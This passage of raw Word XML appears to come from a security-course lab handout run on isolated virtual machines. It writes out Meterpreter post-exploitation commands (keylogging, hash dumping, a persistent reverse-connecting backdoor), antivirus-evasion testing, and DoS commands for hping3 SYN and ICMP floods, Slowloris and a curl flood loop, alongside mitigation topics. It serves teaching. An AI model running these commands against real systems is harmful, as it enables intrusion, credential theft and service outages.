      </w:r>
    </w:p>
    <w:p w14:paraId="4711E087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13DF7F9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List active sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002EE14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sessions -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218552B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2C1E104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Interact with session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E2055C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sessions -i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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F4690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726DD36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Meterpreter commands to explore:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5440E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sysinfo    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System information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D49DA9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getuid     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Current user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6552DCF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ps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List processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F4E0D4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pwd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 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Current directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B61F5B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screenshot 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Take screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281C390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keyscan_start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Start keylogger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC3DF2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keyscan_dump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Dump captured keystrokes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E551524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hashdump  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Dump password hashes (requires privilege escalation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6118D97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15BD72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File operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5A48C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download C:\\Users\\Public\\Desktop\\target_file.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A741C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upload /root/tool.exe C:\\Temp\\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289250D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0335B9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Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4E48E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run persistence -X -i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-p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4444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-r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.100.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4FF94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1A1BAC9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Clean up and exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B9818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sessions -K                </w:t>
      </w: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Kill all sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AB4CB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exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AA2007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Document Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609BA4CD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a detailed analysis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293"/>
        <w:gridCol w:w="4267"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C34A87" w:rsidRPr="00C34A87" w14:paraId="460052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E3AD7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2F4394D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3E4707BA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Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C34A87" w:rsidRPr="00C34A87" w14:paraId="6DB3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491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C6BC96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 established</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E1B706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IP: 192.168.100.10, Port: 4444</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C34A87" w:rsidRPr="00C34A87" w14:paraId="49053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5158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477641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payload1.exe running</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33471534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PID: [record], Parent: explorer.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C34A87" w:rsidRPr="00C34A87" w14:paraId="674D2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F2F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46F7447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Created files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1709A009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[List locations]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C34A87" w:rsidRPr="00C34A87" w14:paraId="132C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EE9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5DA9BB2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Persistence key added</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="537D90E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HKLM...\Run[key_name]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C34A87" w:rsidRPr="00C34A87" w14:paraId="0E614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82F4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24F9950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it did</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15D7AF0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Opened backdoor, captured keystrokes, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4586003C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F774B3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0C3C61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Lab Exercise 4: Antivirus Detection Testing (30 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3193B82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Restore Clean Windows VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0C6871" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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Revert to snapshot: "Clean_Week3_Lab"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760F7A55" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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 Windows VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD5136D" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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Windows Defender is ENABLED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5722D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Test Unencoded Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E1C2E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Copy payload1.exe to Windows VM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FE84A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Expected Result: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Windows Defender should detect and quarantine it immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A342D72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Document:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC05764" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34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time (immediate/delayed?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E55D29" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34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Threat name identified by Windows Defender</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2133D2D3" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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taken (quarantine/delete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2BB5D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Windows Defender logs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EB634E" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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Windows Security → Virus &amp; threat protection → Protection history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484D6048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Test Encoded Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7385CB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 test with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payload_encoded.exe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9E09C3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Observations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D56077" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34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Was it detected?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE28C85" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34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long before detection?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A35BB9C" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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rate comparison</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6B1BB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VirusTotal Analysis (Hash Only!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A13700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CRITICAL: Upload HASH only, NOT the actual file!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BEBFD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Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED2BDDA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35CA1BC1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Generate file hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25978080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md5sum ~/malware_lab/payload1.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4029699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sha256sum ~/malware_lab/payload1.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC5B84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Visit VirusTotal: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https://www.virustotal.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F3C3D03" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34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 to "Search" tab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FD6A2B" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34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Enter the SHA256 hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DEB16F" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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 detection rates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1249E9E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Document:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389F496A" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Number of AV engines detecting it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D04312" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Detection ratio (e.g., 45/70)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA9E208" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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common threat names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3951143D" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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vendors detected it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76823F0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Evasion Techniques Discussion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB7D0D7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Research and document common evasion methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD3D367" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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Encoding/encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C61BD4E" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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Obfuscation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA83D97" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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Packing/compression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4FA50B" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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Polymorphic code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337B7302" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F7EFAA" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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Fileless malware (memory-only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB221BA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E8E653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FC4B5A9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Exercise 5: DoS Attack Simulation (40 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2879ED1D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Set Up Target (Metasploitable VM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688A276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Configure Metasploitable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1716B1A0" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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IP: 192.168.100.30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA90FBB" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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Network: Internal (intnet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCD5325" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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web server running: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFBA6F4" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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Kali: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curl http://192.168.100.30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1040C9C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Baseline Performance Measurement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208A1A7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Kali, measure normal response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D26C130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02CE4CD8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Measure HTTP response time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F66BE6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time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http://192.168.100.30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A4522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31EFE0D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Ping test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A91163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ping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-c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.100.30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0EC0E2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00A63B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Connection test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A00D24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nc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-zv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.100.30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80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C24F79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Record baseline metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413C448F" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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ping time: _____ ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401F0BD3" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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 response time: _____ seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02156A62" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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responding: Yes/No</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9EE51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5.3 SYN Flood Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC701F1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Using hping3 on Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A24492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712D714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SYN flood attack (moderate intensity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77608F3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sudo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hping3 -S -p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80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--flood --rand-source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.100.30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E63B8CD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this does:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B57FBD" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Send SYN packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F26BBF" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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-p 80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Target port 80 (HTTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1C626A" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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--flood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Send packets as fast as possible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF86928" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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--rand-source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Randomize source IPs (spoofing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE6E58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 Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E00E04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 another Kali terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AA163C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4223C60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Try to access web server during attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7171BAC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http://192.168.100.30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3317979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B1F95A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Ping during attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BE30E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ping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.100.30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C667E4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Metasploitable (if accessible):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23068551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4C35380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View connection states</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B29EC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netstat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-an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grep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:80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|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wc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-l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F825AB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56DFD6B5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Monitor CPU/memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643CB39F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top</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C3BAC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observations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADFFF02" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Server response time during attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E46F6D2" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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success rate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0377C350" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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Resource consumption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248C92A1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STOP THE ATTACK:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE1F7AA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5AE7120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Press CTRL+C in hping3 terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAC0F4D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5.4 ICMP Flood (Ping Flood)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD3FEF8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6BE975F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ICMP flood attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76605B86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sudo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hping3 --icmp --flood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192.168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>.100.30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A4242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 and document:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590CE654" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Bandwidth consumption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EED1AC0" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Ping response time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492829B7" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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availability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D535E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attack after 30 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2281083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5.5 HTTP GET Flood (Application Layer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B256CD7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Using slowhttptest (install if needed):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CD50CA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60A149A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Install slowhttptest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269421BB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sudo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apt-get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install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slowhttptest -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDEB909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4A6D474A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Slowloris attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D54C47D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slowhttptest -c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-H -g -o slowloris_results -i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10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-r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200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-t GET -u http://192.168.100.30 -x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24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-p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3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1802CAC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Parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E28EB56" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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-c 200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200 connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D915F0" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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-H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Slowloris mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2B6DE8" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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-i 10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10-second interval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26242F54" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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 200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connections per second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55387F62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 - Simple HTTP flood with curl:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737BB295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bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7EF21E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:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t># Bash script for HTTP flood</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001B49A3" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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C34A87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while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:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>true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; </w:t>
      </w:r>
      <w:r w:rsidRPr="00C34A87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do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curl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http://192.168.100.30 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C34A87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:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C34A87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</w:t>
      </w:r>
      <w:r w:rsidRPr="00C34A87">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:color w:val="A626A4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E4928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Monitor server during attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D56A1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Stop all attacks and allow server to recover.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E537C3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5.6 DoS Mitigation Discussion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D1735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potential defenses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1541D7C0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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FE94C1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SYN cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569D65D6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timeouts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F58A5A5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Firewall rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D7A227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IDS/IPS detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09748BB6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DDoS mitigation services (Cloudflare, Akamai)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57207AEA" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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capacity planning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14184CE2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7CE953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34A46D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Exercise 6: Physical Security Demonstration (20 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538C0CD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Hardware Keylogger Identification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED5FF3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Instructor will demonstrate or show images of:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AD6AD4" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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PS/2 keyloggers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E80C2D" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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USB keyloggers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E27E6EC" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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Wireless keyloggers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD2DE0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activity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439B7FFD" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Inspect classroom computers for any suspicious hardware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F89EC85" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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visual indicators to look for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29437B77" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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Discuss detection methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE4533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Boot-based Attack Demonstration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E58DCF6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Instructor demonstration (or guided walkthrough):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3221B8DD" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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 Windows VM from Kali Linux ISO (or Ophcrack)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BDB48D" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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how boot-based tools bypass Windows security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C45CE3" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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 password reset or hash extraction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522C5E3C" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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Discuss importance of: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B28019C" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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BIOS/UEFI passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D28109" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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 order restrictions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EACF50F" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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disk encryption (BitLocker)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C422288" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A87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access controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00338C5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USB Drop Attack Awareness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549B52F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Discussion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CA0559" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Dangers of unknown USB devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123C2417" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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BadUSB attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28414A64" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Rubber Ducky attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCFB578" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Defense mechanisms: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A719FF4" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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training</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141201B9" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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 AutoRun</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D8E4E3" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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USB port blocking</w:t>
      </w:r>
    </w:p>
